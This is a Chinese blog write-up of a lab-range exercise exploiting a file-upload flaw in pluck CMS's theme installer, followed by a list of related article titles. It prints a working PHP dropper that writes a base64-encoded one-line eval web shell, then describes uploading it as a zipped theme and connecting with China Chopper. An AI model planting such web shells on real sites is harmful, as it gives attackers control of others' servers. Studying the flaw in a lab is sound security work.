东塔靶场之文件上传cms--pluck
东塔靶场之文件上传cms–pluck
pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识,也可以很容易地使用它来管理站点,功能有给页面插照片、在blog里写文章、分享照片等
pluck cms后台存在文件上传漏洞,攻击者可以利用该漏洞获取获取服务器权限
准备:
- 一个info.php文件
<?php file_put_contents('qianxun.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+'));?>
其中PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+
是一句话木马<?php @eval($_POST[cmd]); ?>
的base64编码。
file_put_contents
函数把一个字符串写入文件中。与依次调用 fopen(),fwrite() 以及 fclose() 功能一样。
- 将info.php文件打包成shell.zip文件
- 菜刀、浏览器
开搞:
打开主页登录:
密码为admin
进入到选择主题界面:
点击安装主题:
将之前准备的shell.zip上传:
点击回到主题页:
此时,shell.zip已被自动解压,其中的一句话木马已被写入。
直接用菜刀连接获取shell:
成功!
小结:
今天刷了东塔的文件上传类的靶场,感觉系统学过一边后通关很简单,能把学到的用起来就很爽,正所谓学而时习之,不亦说乎?哈哈哈,不过还需要继续练习更多才能开阔思路,运用到实战,明天继续加油!over
东塔靶场之文件上传cms--pluck相关推荐
- Pikachu靶场之文件上传漏洞详解
Pikachu靶场之文件上传漏洞详解 前言 文件上传漏洞简述 什么是文件上传漏洞? 文件上传的原理 文件上传漏洞有哪些危害 文件上传漏洞如何查找及判断 文件上传如何防御 文件上传漏洞绕过的方式有哪些 ...
- [网络安全自学篇] 三十一.文件上传之Upload-labs靶场及CTF题目01-10(四)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了编辑器漏洞和IIS高版本文件上传漏洞,包括FCKeditor.eWeb ...
- 探究文件上传安全:upload-labs靶场的绕过技巧
数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 文件上传基础 01 什么是文件上传 02 文件上传产生漏洞的原因 ...
- 文件上传漏洞小结与Upload-labs 靶场纪实
WEB安全--文件上传靶场记录 文章目录 WEB安全--文件上传靶场记录 文件上传的思路与分类(图片转自小迪): 一.前端验证的绕过 Pass 01 二.验证绕过--白名单 1.MIME验证绕过 pa ...
- [网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗(六)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...
- 网络安全课第七节 文件上传漏洞的检测与防御
13 文件上传漏洞:种植服务器木马的捷径 上一讲介绍过反序列化漏洞,利用漏洞常可以造成执行代码的严重后果. 从本讲开始将介绍文件上传漏洞,它比反序列化漏洞原理与利用更加简单,但同样可以达到控制服务器的 ...
- 文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)
文件上传漏洞 什么是文件上传漏洞 什么是webshell 一句话木马大全 产生文件上传漏洞的原因 文件上传漏洞的攻击与防御方式 1.前端限制 2.检查扩展名 1.黑名单策略, 2.白名单策略 3.检查 ...
- 帝国cms empirecms 文件上传 (CVE-2018-18086)复现
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题 empirecms 文件上传 (CVE-2018-18086) 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 0x04 漏洞 ...
- (20)文件上传漏洞:原理、原因、常见触发点分析,vulhub、upload、公开cms上传漏洞多种方法测试
目录 理解文件上传漏洞: 文件上传漏洞: 文件上传漏洞: WebShell: 一句话木马: 产生上传漏洞原因: 原因: 常见的问题: 危害: 触发点,并判断是否存在文件上传漏洞: 触发点: 查找方法: ...
最新文章
- c++ - Create empty json array with jsoncpp - Stack Overflow
- Eclipse设置字符编码
- 开源SVM库libSVM介绍
- 当电路与艺术相结合,美的让人窒息!
- HAproxy编译安装
- 【Elasticsearch】使用Elasticsearch实现同段和同句搜索
- Eclipse编写第一个Java程序
- 腾讯地图api修改信息窗口样式_ThingJS通过地图的信息窗口展示常见数据
- idea超炫的自定义模板
- windows10 关闭欢迎界面
- 如何解决浏览器被网站劫持
- 同时定位与地图创建综述
- ARM裸机篇(三)——i.MX6ULL第一个裸机程序
- vmware启动虚拟机报“内部错误”的解决方法
- (很容易懂,你把代码复制粘贴即可解决问题)高等代数/线性代数-基于python实现矩阵法求解齐次方程组
- 用循环不定式来证明冒泡排序的正确性
- SpringMVC转SpringBoot步骤+心得
- PHP socket demo
- Android EventLog含义
- mysql去除括号以及括号中的字符